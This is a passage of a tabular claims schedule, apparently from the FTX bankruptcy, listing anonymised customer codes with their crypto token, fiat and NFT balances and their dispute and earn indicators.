| 07328774 | | BCH[0], BRZ[1], BTC[0], CUSDT[6], DOGE[2], GRT[1], TRX[4], USD[0.00] | | |
| 07328776 | | USD[10.00] | | |
| 07328777 | | USD[10.00] | | |
| 07328779 | | CUSDT[1], DOGE[1.00006662], TRX[1], USD[0.00] | Yes | |
| 07328780 | | BCH[.06278039], BTC[.00344779], CUSDT[25], DOGE[36.45169986], ETH[.02036215], ETHW[.02011041], TRX[4], USD[83.41] | Yes | |
| 07328781 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07328782 | | USD[10.00] | | |
| 07328784 | | USD[10.00] | | |
| 07328788 | | CUSDT[4], DOGE[1182.63465576], ETH[.00678091], ETHW[.00678091], TRX[2], USD[0.00] | | |
| 07328791 | | BRZ[1], CUSDT[9], DOGE[209.64824833], GRT[1], SHIB[1], USD[0.00] | | |
| 07328792 | | BTC[0], DOGE[0], ETH[0], USD[0.00] | Yes | |
| 07328793 | | USD[10.00] | | |
| 07328794 | | USD[0.00] | | |
| 07328796 | | DOGE[8], LINK[8.13664391], LTC[1.14846915], USD[0.00], USDT[0] | | |
| 07328797 | | USD[10.00] | | |
| 07328799 | | USD[10.00] | | |
| 07328800 | | SHIB[1], SOL[0], USD[0.00], USDT[0.00000048] | Yes | |
| 07328801 | | USD[10.00] | | |
| 07328802 | | USD[10.00] | | |
| 07328803 | | USD[10.00] | | |
| 07328804 | | USD[0.01] | | |
| 07328805 | | USD[10.00] | | |
| 07328806 | | CUSDT[2], DOGE[3], SHIB[251962.02747672], USD[0.00] | | |
| 07328807 | | DOGE[145.29739703], USD[0.00] | Yes | |
| 07328808 | | CUSDT[1], ETH[0], USD[0.00] | Yes | |
| 07328809 | | GRT[5.44624016], USD[0.00] | | |
| 07328810 | | USD[10.00] | | |
| 07328811 | | TRX[1], USD[0.06] | | |
| 07328813 | | DOGE[2138.54058217], LINK[.00011116], MATIC[.00510622], SHIB[6], SOL[25.37237915], SUSHI[.00031598], TRX[1], USD[0.01] | Yes | |
| 07328814 | | BTC[.00000701], DOGE[.00009587], TRX[2], USD[1.22] | | |
| 07328815 | | USD[10.00] | | |
| 07328816 | | USD[0.00] | Yes | |
| 07328817 | | CUSDT[1], DOGE[2383.67897063], SHIB[1296106.24441667], TRX[1], USD[0.00] | Yes | |
| 07328818 | | USD[10.00] | | |
| 07328819 | | DOGE[122.91463038], TRX[1], USD[0.00] | | |
| 07328821 | | USD[10.00] | | |
| 07328822 | | DOGE[2814.5888], USD[1406.02] | | |
| 07328823 | Contingent, Disputed | USD[0.01] | | |
| 07328825 | | USD[10.00] | | |
| 07328827 | | BTC[.00073921], CUSDT[2], DAI[9.95203021], DOGE[812.30048431], ETH[.004191], ETHW[.004191], LTC[.05678579], MATIC[16.27318273], SOL[.23406906], SUSHI[.8879601], TRX[205.39047082], USD[20.00], USDT[9.93811417] | | |
| 07328828 | | USD[10.00] | | |
| 07328829 | | USD[10.00] | | |
| 07328830 | | CUSDT[1], DOGE[2.54745656], SUSHI[.00004056], USD[0.00] | | |
| 07328832 | | CUSDT[3], DOGE[144.78567554], USD[0.01] | Yes | |
| 07328833 | | BAT[31.90523443], BRZ[106.18531024], BTC[.00115743], CUSDT[7], DOGE[2069.28965386], ETH[.02433692], ETHW[.02433692], GRT[20.20380221], SHIB[1098177.02613661], SOL[2.16047462], SUSHI[1.91556313], TRX[2410.54958274], UNI[1.38076965], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07328834 | | BAT[15380.06884438], BF_POINT[300], BRZ[3], CUSDT[3], GRT[1], NFT (330335318470471227/Shannon Sharpe's Playbook: Kansas City Chiefs vs Denver Broncos - October 4, 1992 #68)[1], NFT (487243029081317657/Shannon Sharpe's Playbook: Baltimore Ravens vs. Denver Broncos - December 31, 2000 #64)[1], NFT (566947460024707852/Shannon Sharpe's Playbook: Baltimore Ravens vs. Oakland Raiders - January 14, 2001 #78)[1], NFT (571253200303495020/Joe Theismann's Playbook: Washington vs. Miami Dolphins - January 30, 1983 #55)[1], NFT (573988770352777479/Tim Brown's Playbook: San Diego Chargers vs. Los Angeles Raiders - September 4, 1988 #48)[1], SHIB[4301.52566126], SOL[.00509963], TRX[6], UNI[111.30418433], USD[0.02], USDT[2.11025451] | Yes | |
| 07328835 | | BAT[3.02059846], CUSDT[2], DOGE[38.84457133], USD[0.69], USDT[0] | | |
| 07328836 | | CUSDT[1], GRT[5.73521584], USD[0.00] | | |
| 07328837 | | BRZ[1], CUSDT[4], TRX[3], USD[0.01], USDT[1] | | |
| 07328838 | | USD[11.06] | Yes | |
| 07328839 | | USD[10.00] | | |
| 07328840 | | BTC[.00023186], CUSDT[2], GRT[1], USD[0.00] | | |
| 07328841 | | CUSDT[2], ETH[.00396786], ETHW[.00396786], USD[0.01] | | |
| 07328843 | | USD[10.00] | | |
| 07328845 | | BRZ[1], CUSDT[50.80906415], DOGE[.38170288], TRX[2], USD[0.45] | Yes | |
| 07328847 | | USD[10.00] | | |
| 07328848 | | BRZ[1], CUSDT[1], DOGE[1], USD[0.01] | | |
| 07328849 | | CUSDT[1], DOGE[374.84933399], USD[10.00] | | |
| 07328850 | | BAT[16.03843347], CUSDT[1], DOGE[3651.17523578], TRX[14511.32162708], USD[0.00], USDT[1] | | |
| 07328851 | | USD[10.00] | | |
| 07328852 | | BTC[.00019341], CUSDT[1], ETHW[.17465736], SHIB[1], TRX[1], USD[0.00] | Yes | |
| 07328853 | | BRZ[1], CUSDT[7], DOGE[265.10637802], TRX[1], USD[0.00] | | |
| 07328854 | | BAT[1], BTC[.00138066], CUSDT[1], DOGE[1], SHIB[2], SOL[0.00000001], TRX[1], USD[0.01] | Yes | |
| 07328855 | | USD[10.00] | | |
| 07328856 | | USD[10.00] | | |
| 07328857 | | USD[0.24] | | |
| 07328858 | | BAT[1], CUSDT[1], USD[0.01] | | |
| 07328859 | | DOGE[1], USD[10.33] | | |
| 07328860 | | BTC[0], CUSDT[2], DOGE[1], TRX[1], USD[0.01] | | |
| 07328861 | | USD[10.00] | | |
| 07328862 | | USD[10.00] | | |
| 07328864 | | DOGE[1.81238975], USD[0.47] | | |
| 07328865 | | USD[10.00] | | |
| 07328866 | | USD[0.00] | | |
| 07328867 | | DOGE[.00000109], USD[0.00] | | |
| 07328868 | | CUSDT[4], TRX[2], USD[0.00] | | |
| 07328869 | | BAT[3], BRZ[10], BTC[0], CUSDT[18], GRT[2], SHIB[2], TRX[20], USD[0.01], USDT[0] | | |
| 07328870 | | DOGE[2], SUSHI[.00018182], USD[0.00] | | |
| 07328871 | | BTC[.00279061], CUSDT[5], DOGE[1], MATIC[.00006687], TRX[0.01266086], USD[0.00] | Yes | |
| 07328872 | | BRZ[1], BTC[0], CUSDT[4], DOGE[5019.47781315], LINK[0], TRX[4], USD[0.00] | | |
| 07328873 | | BRZ[1], CUSDT[2], DOGE[2], TRX[2], USD[0.00] | | |
| 07328874 | | USD[10.00] | | |
| 07328875 | | DOGE[1353.47710463], USD[0.00] | Yes | |
| 07328876 | | USD[0.00] | | |
| 07328877 | | USD[10.00] | | |
| 07328878 | | BCH[.04660121], BTC[.0010314], CUSDT[4], DOGE[89.90200576], SUSHI[2.64475953], TRX[2], USD[0.01], YFI[.00044338] | Yes | |
| 07328879 | | CUSDT[1], DOGE[.58443544], USD[0.00] | | |
| 07328880 | | USD[10.00] | | |
| 07328881 | | USD[10.00] | | |
| 07328883 | | DOGE[69.36618589], USD[5.00] | | |
| 07328884 | | USD[10.00] | | |
| 07328885 | | CUSDT[1], USD[0.01] | | |
| 07328886 | | USD[10.00] | | |
| 07328887 | | DOGE[1], USD[0.00] | Yes | |
| 07328888 | | DOGE[41.50409278], USD[0.00] | Yes | |
| 07328889 | | USD[7.47] | | |
| 07328891 | | DOGE[1], SHIB[0], USD[0.01] | | |
| 07328893 | | CUSDT[2], DOGE[1], TRX[2], USD[0.00] | Yes | |
| 07328894 | | GRT[.915], SOL[2.445], SUSHI[.496], TRX[.118], UNI[.098], USD[0.85], USDT[0] | | |
| 07328895 | | USD[10.00] | | |
| 07328896 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07328899 | | USD[0.00] | | |
| 07328900 | | USD[0.00] | | |
| 07328901 | | DOGE[0], ETH[.00000001], TRX[1], USD[0.00], USDT[0.00000001] | | |
| 07328902 | | USD[10.00] | | |
| 07328903 | | USD[10.00] | | |
| 07328904 | | BRZ[0], DOGE[0], ETH[0], ETHW[0], USD[0.00], USDT[0] | | |
| 07328905 | | USD[0.00] | | |
| 07328906 | | USD[0.00] | | |
| 07328907 | | CUSDT[2], DOGE[3.60434333], SHIB[1], TRX[2], USD[0.00], USDT[0] | | |
| 07328908 | | BF_POINT[200], CUSDT[6], DOGE[1], ETH[0.00000001], ETHW[2.10245413], SOL[0], TRX[2], USD[0.00] | Yes | |
| 07328909 | | USD[10.00] | | |
| 07328910 | | BTC[0], CUSDT[2], DOGE[2], ETH[0], GRT[1], TRX[3], USD[0.00], USDT[0] | | |
| 07328911 | | BTC[.00014617], CUSDT[5], DOGE[574.2076013], GRT[5.16914341], SOL[1.42157042], TRX[292.5096948], USD[0.00], USDT[4.95206872] | | |
| 07328912 | | USD[10.00] | | |
| 07328913 | | USD[10.00] | | |
| 07328914 | | USD[10.00] | | |
| 07328915 | | CUSDT[3], DOGE[.50126702], USD[0.00], USDT[9.94208625] | | |
| 07328916 | | BRZ[1], BTC[0], CUSDT[4], DOGE[1], GRT[2], TRX[4], USD[0.00] | | |
| 07328917 | | USD[10.00] | | |
| 07328918 | | BRZ[2], DOGE[0], TRX[4], USD[10.00], USDT[2] | | |
| 07328919 | | DOGE[1919.88452939], USD[10.00] | | |
| 07328920 | | USD[10.00] | | |
| 07328921 | | BTC[.00002307], DOGE[143.32646413], TRX[1], USD[11.14] | | |
| 07328922 | | CUSDT[1], DOGE[.16139775], USD[0.36] | | |
| 07328923 | | USD[10.00] | | |
| 07328924 | | DOGE[1949.76995589], USD[60.00] | | |
| 07328925 | | SOL[1.12675581], USD[0.00] | | |
| 07328926 | | CUSDT[1], DOGE[1], SHIB[174373.7543954], USD[0.00] | Yes | |
| 07328927 | | USD[0.00] | | |
| 07328929 | | USD[0.00] | | |
| 07328930 | | BRZ[1], CUSDT[2], USD[0.00] | | |
| 07328931 | | BAT[1], DAI[0], DOGE[1], SUSHI[0], USD[0.00], USDT[0] | | |
| 07328932 | | USD[0.05] | | |
| 07328933 | | BAT[19.26556526], BRZ[2], CUSDT[7], DOGE[1158.46755016], SHIB[4804639.66862953], TRX[916.16557183], USD[0.01] | Yes | |
| 07328934 | | BAT[13.6835546], CUSDT[21], DOGE[6.74890892], ETH[1.0090529], ETHW[1.0090529], MATIC[10.71029429], SHIB[8932482.32824311], SOL[28.09559531], SUSHI[3.26392684], TRX[305.85653537], USD[0.00], USDT[0] | | |
| 07328935 | | TRX[2], USD[0.01] | | |
| 07328936 | | CUSDT[1], TRX[1], USD[391.89] | Yes | |
| 07328937 | | USD[10.00] | | |
| 07328938 | | USD[10.00] | | |
| 07328939 | | USD[10.00] | | |
| 07328940 | | USD[10.00] | | |
| 07328941 | | BTC[0], CUSDT[1], DOGE[.00097794], SHIB[1], USD[207.34] | | |
| 07328942 | | USD[10.00] | | |
| 07328943 | | USD[0.00] | Yes | |
| 07328944 | | GBP[0.00], GRT[0], SOL[0], UNI[0], USD[0.00] | | |
| 07328945 | | BTC[0], DOGE[0], ETH[0], SOL[0], USD[0.00], USDT[0] | | |
| 07328946 | | USD[10.00] | | |
| 07328947 | | USD[10.00] | | |
| 07328948 | | USD[10.00] | | |
| 07328950 | | BAT[67.46886155], BRZ[1], CUSDT[2], DOGE[9702.18946643], NFT (55584038089175064/Entrance Voucher #2636)[1], SOL[80.4966995], TRX[1], USD[0.00] | Yes | |
| 07328951 | | DOGE[.00001176], USD[0.00] | | |
| 07328952 | | USD[0.00] | | |
| 07328953 | | USD[0.00] | | |
| 07328955 | | CUSDT[2], ETH[0.00091581], ETHW[0.00091581], TRX[1], USD[0.94] | | |
| 07328956 | | CUSDT[1], DOGE[21.12704875], USD[0.00] | | |
| 07328957 | | USD[0.00] | | |
| 07328959 | | BTC[.00064379], CUSDT[493.93566951], DOGE[581.87879429], ETH[.00371144], ETHW[.00367037], USD[0.00] | Yes | |
| 07328960 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07328961 | | CUSDT[5], USD[0.00] | | |
| 07328962 | | USD[0.21], USDT[0] | | |
| 07328963 | | CUSDT[2], DOGE[1], SHIB[10752955.09083638], SOL[2.14308417], TRX[1], USD[128.71] | Yes | |
| 07328964 | | ETH[.0001], ETHW[.0001], USD[11.11] | Yes | |
| 07328965 | | CUSDT[1], DOGE[3746.44543715], TRX[154.30731401], USD[0.00] | | |
| 07328966 | | BTC[0], DOGE[0], USD[10.00] | | |
| 07328967 | | USD[10.00] | | |
| 07328968 | | KSHIB[3.42748527], USD[0.00] | | |
| 07328969 | | USD[10.00] | | |
| 07328970 | | BRZ[1], CUSDT[1], USD[10.00], USDT[2] | | |
| 07328971 | | BTC[.0111477], DOGE[741.89278593], TRX[1], USD[0.00] | | |
| 07328972 | | BAT[1.0165555], CUSDT[1], DOGE[2], SUSHI[118.72775365], TRX[1], USD[0.00] | Yes | |
| 07328973 | | BRZ[1], CUSDT[2], DOGE[.64919462], SUSHI[.01638225], TRX[4], USD[0.00] | | |
| 07328974 | | DOGE[1], GRT[6.69865969], USD[0.00] | | |
| 07328977 | | USD[10.00] | | |
| 07328978 | | CUSDT[1], USD[0.01] | | |
| 07328982 | | USD[11.01] | Yes | |
| 07328983 | | LINK[.00575354], USD[0.00] | | |
| 07328984 | | BRZ[1], CUSDT[2], DOGE[1], USD[0.00] | | |
| 07328985 | | DOGE[1071.03462004], SUSHI[5.62021185], USD[0.00] | | |
| 07328986 | | CUSDT[1], DOGE[1344.31900199], ETH[.03187453], ETHW[.03147752], USD[0.00] | Yes | |
| 07328987 | | CUSDT[2], DOGE[1365.61285435], USD[112.37] | | |
| 07328988 | | USD[10.00] | | |
| 07328989 | | BRZ[1], DOGE[1], USD[0.00] | | |
| 07328991 | | USD[10.00] | | |
| 07328992 | | USD[10.00] | | |
| 07328993 | | USD[10.00] | | |
| 07328995 | | DOGE[664.846], USD[60.07] | | |
| 07328996 | | BRZ[1], CUSDT[1], DOGE[.18777353], USD[0.01] | | |
| 07328997 | | ETH[.00000103], ETHW[0.00000102], LTC[0.00002592], SHIB[1], USD[0.00], USDT[0] | Yes | |
| 07328998 | | CUSDT[1], DOGE[2], SOL[8.37724672], TRX[888.78474845], USD[0.00] | | |
| 07328999 | | USD[10.00] | | |
| 07329000 | | BTC[.00020546], DOGE[1244.82431761], USD[0.00] | Yes | |
| 07329001 | | CUSDT[4], USD[0.01] | | |
| 07329002 | | GRT[5.74510389], USD[0.00] | | |
| 07329003 | | USD[0.00] | | |
| 07329004 | | DOGE[1.00049718], USD[33.04] | | |
| 07329005 | | USD[0.06] | Yes | |
| 07329006 | | BTC[0], DOGE[28.35381498], ETH[0], LINK[0], USD[0.00] | | |
| 07329008 | | USD[10.00] | | |
| 07329009 | | BTC[0], CUSDT[3], DOGE[0], ETH[0], GRT[0], LTC[0], USD[0.00] | | |
| 07329010 | | SOL[0.00001020], SUSHI[0], TRX[1], USD[0.00] | Yes | |
| 07329011 | | USD[10.00] | | |
| 07329014 | | USD[10.00] | | |
| 07329016 | | AVAX[0], BCH[0], BTC[0], ETH[0], ETHW[0], LINK[0], LTC[0], MATIC[1.00133710], SOL[0], TRX[0], UNI[0], USD[1.01], USDT[0] | | |
| 07329018 | | USD[10.00] | | |
| 07329019 | | CUSDT[1], DOGE[34.69938557], TRX[.00927564], USD[0.72] | | |
| 07329020 | | USD[10.00] | | |
| 07329021 | | BTC[.00371368], CUSDT[4], DOGE[1169.40874847], TRX[2], USD[0.04] | Yes | |
| 07329024 | | USD[10.00] | | |
| 07329026 | | CUSDT[1], USD[0.01] | | |
| 07329027 | | USD[10.00] | | |
| 07329028 | | USD[10.00] | | |
| 07329030 | | USD[10.00] | | |
| 07329032 | | USD[10.00] | | |
| 07329033 | | BTC[0], DAI[.00000001], ETH[0.27184160], ETHW[0], SOL[0], USD[1.19], USDT[1.044] | | |
| 07329034 | | SOL[3.9964], USD[20.00] | | |
| 07329035 | | USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07329036 | | BTC[.0000029], USD[0.00] | | |
| 07329037 | | CUSDT[1], ETH[.00001362], ETHW[.00001362], LINK[0], USD[0.00] | | |
| 07329038 | | USD[10.00] | | |
| 07329041 | | BTC[0], USD[0.55] | | |
| 07329042 | | BTC[.0000014], DOGE[0.00849022], USD[0.00] | | |
| 07329044 | | USD[10.00] | | |
| 07329046 | | BTC[.00000663], DOGE[11189.39169916], ETH[0.00088078], ETHW[0.00088078], USD[0.27] | | |
| 07329047 | | USD[10.00] | | |
| 07329048 | | USD[10.00] | | |
| 07329049 | | LINK[1.7], LTC[.97], SOL[0], TRX[30], USD[0.41] | | |
| 07329050 | | USD[10.00] | | |
| 07329051 | | CUSDT[1], DOGE[3], TRX[3], USD[10.84] | Yes | |
| 07329052 | | BCH[0], BTC[0], CUSDT[16], DOGE[1], ETH[0], LINK[0], MATIC[0], SOL[0], SUSHI[0], UNI[0], USD[0.00], USDT[2.00000001] | | |
| 07329053 | | ETH[.00000023], ETHW[.00000023], USD[0.00] | | |
| 07329054 | | USD[0.01] | | |
| 07329055 | | BTC[.00000017], DOGE[144.0819655], TRX[2], USD[0.00] | | |
| 07329056 | | USD[10.00] | | |
| 07329058 | | ETH[0], MATIC[0], SUSHI[0], USD[0.00] | | |
| 07329060 | | USD[10.00] | | |
| 07329061 | | TRX[.000025], USD[0.01], USDT[0] | | |
| 07329064 | | DOGE[2519.91622956], TRX[1], USD[0.00] | Yes | |
| 07329065 | | BRZ[3], CUSDT[3], GRT[1], TRX[4], USD[0.00] | | |
| 07329066 | | CUSDT[1], DOGE[.00009573], TRX[2], USD[0.01] | | |
| 07329067 | | USD[10.00] | | |
| 07329068 | | USD[10.00] | | |
| 07329069 | | BF_POINT[300], CUSDT[18], DOGE[4727.57270412], ETH[.00000025], ETHW[.00000025], LTC[.00000146], TRX[3], USD[0.00] | Yes | |
| 07329070 | | DOGE[442.87114401], USD[0.33] | | |
| 07329071 | Contingent, Disputed | DOGE[0], LINK[0], SOL[0], SUSHI[0], UNI[0], USD[0.00], USDT[0] | | |
| 07329072 | | USD[10.00] | | |
| 07329073 | | USD[10.00] | | |
| 07329074 | | USD[10.00] | | |
| 07329075 | | SOL[.00826], USD[0.05] | | |
| 07329076 | | USD[10.00] | | |
| 07329077 | | USD[10.00] | | |
| 07329079 | | USD[10.00] | | |
| 07329081 | | DOGE[0], USD[0.00] | | |
| 07329082 | | CUSDT[6], DOGE[980.94117319], NFT (549012676225851403/FTX - Off The Grid Miami #999)[1], TRX[1], USD[0.00] | | |
| 07329084 | | USD[10.00] | | |
| 07329085 | | BTC[.58332118], DOGE[.7967], ETH[3.8171024], ETHW[3.8171024], LTC[.002691], NEAR[2.70335503], SOL[147.722539], USD[-2181.64] | | |
| 07329086 | | DOGE[1], SHIB[304455.27103994], USD[0.00] | Yes | |
| 07329087 | | USD[10.00] | | |
| 07329088 | | TRX[1], USD[0.01] | | |
| 07329089 | | BAT[1.01511763], CUSDT[2], DOGE[2], LINK[.00008372], SHIB[57.70762561], TRX[1], USD[0.00], USDT[0.00000019] | Yes | |
| 07329090 | | DOGE[3.86389934], USD[0.00] | Yes | |
| 07329091 | | ETH[0], TRX[1], USD[10.00], USDT[1] | | |
| 07329092 | Contingent, Disputed | BTC[0], DOGE[428.31315927], ETH[0], USD[0.00] | | |
| 07329093 | | CUSDT[4], GRT[1], USD[0.00] | | |
| 07329094 | | USD[10.00] | | |
| 07329095 | | BF_POINT[300], DOGE[0], ETH[0.00000001], ETHW[0], SOL[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07329096 | | BTC[.00210594], DOGE[2], ETH[.31159186], ETHW[.31159186], USD[119.50], USDT[1] | | |
| 07329097 | | USD[10.00] | | |
| 07329098 | | BRZ[1], CUSDT[2], DOGE[84.58425244], ETH[.01140418], ETHW[.01140418], SOL[.30361814], TRX[1], USD[0.89] | | |
| 07329102 | | DOGE[3245.63677595], SHIB[497512.43781094], TRX[1], USD[0.00] | | |
| 07329104 | | BRZ[1], CUSDT[13], TRX[5], USD[0.01] | Yes | |
| 07329105 | | CUSDT[1], DOGE[3278.6153872], SHIB[166928.41551755], USD[0.00] | Yes | |
| 07329106 | | BTC[.00022436], CUSDT[3], DOGE[70.61253257], TRX[1], USD[0.00] | | |
| 07329108 | | DOGE[2462.00595381], TRX[797.89632048], USD[0.00] | | |
| 07329109 | | BRZ[1], USD[181.56] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07329110 | | USD[10.00] | | |
| 07329111 | | USD[10.00] | | |
| 07329112 | | USD[10.00] | | |
| 07329113 | | BRZ[1], DOGE[1], SOL[0], TRX[1], USD[0.00] | | |
| 07329115 | | CUSDT[4], DOGE[2.53517228], TRX[1], USD[0.01] | | |
| 07329116 | | DOGE[.42138414], ETH[0], USD[0.00] | | |
| 07329117 | | USD[10.00] | | |
| 07329119 | | BRZ[1], DOGE[43.01778735], TRX[1], USD[71.02], USDT[1] | | |
| 07329120 | | USD[10.00] | | |
| 07329122 | | CUSDT[1], DOGE[.0000439], USD[0.01] | | |
| 07329123 | | BTC[0], DOGE[.57] | | |
| 07329124 | | USD[10.00] | | |
| 07329126 | | DOGE[.80212646], TRX[214.79706203], USD[0.01] | | |
| 07329127 | | USD[10.00] | | |
| 07329128 | | CUSDT[2], DOGE[92.79752066], KSHIB[414.22912525], NFT [43057647990826031/Deer 3D Polygon][1], TRX[2], USD[0.00], USDT[0] | | |
| 07329129 | | CUSDT[2], USD[0.01] | | |
| 07329131 | | BTC[.00020896], CUSDT[1], DOGE[1522.39832993], SUSHI[4.67088984], TRX[1], USD[100.00] | | |
| 07329132 | | BTC[.00003743], CUSDT[3], DOGE[0.40753219], SHIB[5], TRX[1.63326433], USD[0.64], USDT[0] | Yes | |
| 07329133 | | BAT[1], CUSDT[3], LINK[2.03093916], LTC[.99796067], TRX[676.88176815], USD[456.81], USDT[2] | | |
| 07329134 | | DOGE[1], TRX[2], USD[0.01] | | |
| 07329135 | | USD[0.14] | | |
| 07329136 | | USD[10.00] | | |
| 07329137 | | USD[10.00] | | |
| 07329138 | | BRZ[1], DOGE[1], TRX[1], USD[0.00] | | |
| 07329139 | | USD[10.00] | | |
| 07329140 | | USD[10.00] | | |
| 07329141 | | DOGE[0], TRX[2], USD[0.00] | | |
| 07329142 | | DOGE[.0008937], USD[62.14] | | |
| 07329143 | | USD[10.00] | | |
| 07329144 | | USD[10.00] | | |
| 07329145 | | DOGE[.22316167], GRT[1], USD[0.00] | | |
| 07329146 | | USD[10.00] | | |
| 07329147 | | USD[0.01], USDT[0] | Yes | |
| 07329148 | | USD[10.00] | | |
| 07329149 | | CUSDT[4], USD[0.00] | | |
| 07329150 | | USD[10.00] | | |
| 07329151 | | USD[10.00] | | |
| 07329152 | | USD[10.00] | | |
| 07329153 | | USD[0.00], USDT[0] | Yes | |
| 07329155 | | BTC[0.00000042], DOGE[.6458], ETH[.55664874], ETHW[.55664874], SOL[.00169], USD[0.78], USDT[89.26552400] | | |
| 07329156 | | USD[10.00] | | |
| 07329157 | | USD[10.00] | | |
| 07329158 | | CUSDT[241.55783744], DOGE[25.53275497], ETH[.00051304], ETHW[.00051304], USD[0.00] | | |
| 07329159 | | USD[10.00] | | |
| 07329160 | | USD[0.00] | | |
| 07329162 | | GRT[.00005262], USD[0.00] | | |
| 07329163 | | USD[10.00] | | |
| 07329166 | | USD[10.00] | | |
| 07329167 | | USD[10.00] | | |
| 07329168 | | BTC[.00123881], DOGE[2743.68932794], ETH[.07151129], ETHW[.07151129], TRX[3], USD[0.00] | | |
| 07329169 | | DOGE[3.00000767], LINK[.00009651], TRX[2], UNI[.00006365], USD[0.00] | | |
| 07329170 | | DOGE[1169.59808801], ETH[.00997137], ETHW[.00997137], USD[0.00] | | |
| 07329171 | | USD[1.43] | | |
| 07329172 | | USD[0.01] | | |
| 07329173 | | USD[10.00] | | |
| 07329174 | | USD[10.00] | | |
| 07329175 | | USD[0.00] | | |
| 07329176 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07329178 | | USD[0.01], USDT[0] | | |
| 07329179 | | MATIC[24.795571], SHIB[11], TRX[1], USD[0.00] | | |
| 07329180 | | CUSDT[1], USD[33.60] | | |
| 07329181 | | ETH[.00000001], USD[1.13], USDT[0] | | |
| 07329182 | | USD[10.00] | | |
| 07329183 | | USD[10.00] | | |
| 07329184 | | DOGE[5338.70164537], GRT[1], TRX[3], USD[0.00] | | |
| 07329185 | | BAT[1.01655549], CUSDT[2], TRX[1], USD[0.00] | Yes | |
| 07329186 | | USD[10.00] | | |
| 07329187 | | CUSDT[2], DOGE[.0004681], USD[0.01] | Yes | |
| 07329188 | | DOGE[13.7983809], USD[0.00] | | |
| 07329189 | | USD[10.00] | | |
| 07329190 | | CUSDT[2], DOGE[.00022408], ETH[.00270943], ETHW[.00270943], TRX[2], USD[0.95] | | |
| 07329191 | | USD[10.00] | | |
| 07329192 | | USD[10.00] | | |
| 07329193 | | USD[10.00] | | |
| 07329194 | | BRZ[1], USD[10.00] | | |
| 07329195 | | USD[10.00] | | |
| 07329196 | | BRZ[1], SHIB[1], USD[0.00] | | |
| 07329198 | | BAT[0], BRZ[3], BTC[0], CUSDT[6], DOGE[2], ETH[0], GRT[1], LTC[0], SOL[0], TRX[6], USD[0.00], USDT[0.00001229] | Yes | |
| 07329199 | | BAT[.2016], BCH[.000568], DOGE[.627], GRT[.277], LINK[.09792], LTC[.000354], MATIC[4.982], SOL[.03246], TRX[.0076], UNI[.04076], YFI[.0005986] | | |
| 07329200 | | BRZ[1], CUSDT[7], DOGE[1], LINK[0], SOL[0], TRX[1], USD[0.01] | Yes | |
| 07329201 | | USD[10.00] | | |
| 07329202 | | DOGE[176.37741945], USD[0.00] | | |
| 07329203 | | BRZ[3], BTC[0], CUSDT[11], DOGE[0], ETH[0], TRX[2], USD[0.01], USDT[0] | | |
| 07329204 | | DOGE[.72433667], USD[0.00] | | |
| 07329206 | | BTC[0], DOGE[0], ETH[0], LINK[0], NFT (3365423604339950661/Haleakala National Park #2)[1], NFT (442291068506110741/Haleakala National Park)[1], SOL[0], TRX[0], USD[3.29] | | |
| 07329207 | Contingent, Disputed | CUSDT[354.13458518], USD[0.00], USDT[2.56332199] | Yes | |
| 07329208 | | DOGE[1837.19455289], MATIC[51.3271805], SHIB[1], USD[10.00] | | |
| 07329209 | | DOGE[25.97553946], USD[0.00] | | |
| 07329210 | | USD[10.00] | | |
| 07329212 | | USD[10.00] | | |
| 07329213 | | USD[10.00] | | |
| 07329214 | | BTC[.0022908], DOGE[498], ETH[.030876], ETHW[.030876], USD[1.72] | | |
| 07329215 | | USD[10.00] | | |
| 07329217 | | CUSDT[1], USD[0.00] | | |
| 07329218 | | USD[10.00] | | |
| 07329219 | | USD[10.00] | | |
| 07329220 | | USD[10.00] | | |
| 07329221 | | DOGE[1], USD[0.01] | | |
| 07329222 | | USD[10.00] | | |
| 07329223 | | USD[10.00] | | |
| 07329224 | | BRZ[1], CUSDT[1], DOGE[994.73968063], SHIB[2281989.61040029], TRX[1], USD[0.00] | Yes | |
| 07329225 | | DOGE[1490.05803478], TRX[1], USD[10.00] | | |
| 07329226 | | USD[10.00] | | |
| 07329227 | | USD[10.00] | | |
| 07329228 | | BTC[0], CUSDT[1], DOGE[5], ETH[0], GRT[0], TRX[1], USD[0.00], USDT[0.00571122] | | |
| 07329229 | | DOGE[108.53312986], USD[0.00] | Yes | |
| 07329230 | | AVAX[.051835], BTC[.00004751], ETHW[.0002007], SUSHI[.181225], TRX[.69575], USD[3.49], USDT[6.87598071] | | |
| 07329231 | | DOGE[29.69081558], USD[0.00] | | |
| 07329232 | | DOGE[4.07973488], USD[0.75] | Yes | |
| 07329233 | | BRZ[2], CUSDT[4], GRT[1.00367791], NFT (388172965846163916/Doak Walker's Playbook: Texas vs. SMU - November 1, 1947 #47)[1], SHIB[1547166.20945203], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07329234 | | DOGE[2], ETH[.28365421], ETHW[.28365421], NFT (301043987914387883/Oasis Ocotillo Ferris Wheel #556)[1], NFT (535998377545691667/Coachella x FTX Weekend 2 #4740)[1], SOL[8.51564306], TRX[1.00086402], USD[0.00] | | |
| 07329235 | | DOGE[106.25733306], USD[0.00] | | |
| 07329237 | | USD[10.00] | | |
| 07329239 | | BRZ[3], CUSDT[6], DOGE[25.24530649], TRX[3], USD[0.81] | | |
| 07329240 | | USD[0.00] | | |
